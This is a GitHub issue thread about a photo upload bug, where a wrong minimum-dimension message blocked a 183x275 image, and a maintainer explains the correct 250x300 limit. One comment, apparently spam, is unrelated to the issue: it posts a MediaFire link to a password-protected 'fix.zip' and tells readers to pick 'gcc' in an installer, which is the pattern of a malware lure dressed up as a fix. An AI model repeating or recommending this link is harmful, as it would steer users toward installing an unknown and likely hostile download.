### ISSUE TITLE
Photo Upload Bug

### ISSUE THREAD

**Issue by CourtneyFleeger** [itpartnersillinois/uofi-itp-directory#83]
![Uploading Screenshot 2024-08-26 at 9.19.31 AM.png…]()
Karla McAdam was trying to upload a 183x275 image to the directory. A toast popped up saying 'Error: Picture does not match minimum dimensions 150 width and 300 height (actual file is 183x275)'.

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bryanjonker-illinois** [comment]
It should have been "250 width / 300 height". 

![image](https://github.com/user-attachments/assets/aa0df493-63e4-4663-9a9c-bb542ad82fba)

Right now, if it is below the minimum dimensions, it won't allow you to upload it because of pixelation.
